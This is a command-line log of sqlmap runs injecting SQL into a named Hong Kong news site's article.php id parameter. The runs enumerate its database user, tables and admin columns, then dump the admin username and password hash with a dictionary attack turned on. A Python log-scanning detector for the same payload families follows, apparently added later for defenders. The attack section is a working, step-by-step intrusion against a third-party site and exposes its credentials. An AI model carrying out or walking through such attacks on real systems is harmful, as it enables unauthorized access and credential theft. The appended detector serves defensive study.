D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the fields
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
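A defender-side view of the same run, added here and not part of the original post: a small Python detector that reads Apache access-log lines and flags the four payload families sqlmap reported for the id parameter above, plus any id value that is not an integer. The log lines, client addresses and date are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the four injection families sqlmap reported against the id
# parameter. They are matched against the URL-decoded parameter value.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"information_schema|FLOOR\s*\(\s*RAND\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}

# Apache combined log line; only the client IP and request target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')

def classify_request(target, numeric_params=("id",)):
    """Return [(param, family), ...] for one request target (path + query).
    parse_qs percent-decodes the values. A parameter listed in numeric_params
    that is not an integer is reported even when no signature matched, which
    catches probes the signatures do not know about."""
    findings = []
    for param, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            matched = [fam for fam, pat in SIGNATURES.items() if pat.search(value)]
            findings.extend((param, fam) for fam in matched)
            if param in numeric_params and not matched and not value.strip().lstrip("-").isdigit():
                findings.append((param, "non-numeric value"))
    return findings

def scan_log(lines):
    """Yield (ip, target, findings) for every request with at least one finding."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            findings = classify_request(m.group("target"))
            if findings:
                yield (m.group("ip"), m.group("target"), findings)

# Constructed sample access log: the kind of trail the run above leaves behind
# (payloads shortened and percent-encoded), one benign request and one odd id.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2011:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jan/2011:16:53:54 +0800] "GET /article.php?id=276%20AND%20799=799 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jan/2011:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%20COUNT(*),FLOOR(RAND(0)*2)%20FROM%20information_schema.tables) HTTP/1.1" 500 312',
    '203.0.113.5 - - [10/Jan/2011:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23 HTTP/1.1" 200 4877',
    '203.0.113.5 - - [10/Jan/2011:16:53:56 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Jan/2011:16:54:00 +0800] "GET /article.php?id=abc HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, findings)
```

The same sequence of families showing up from one client within seconds, as it does in the sqlmap output above, is the pattern to alert on; a single hit may be a false positive.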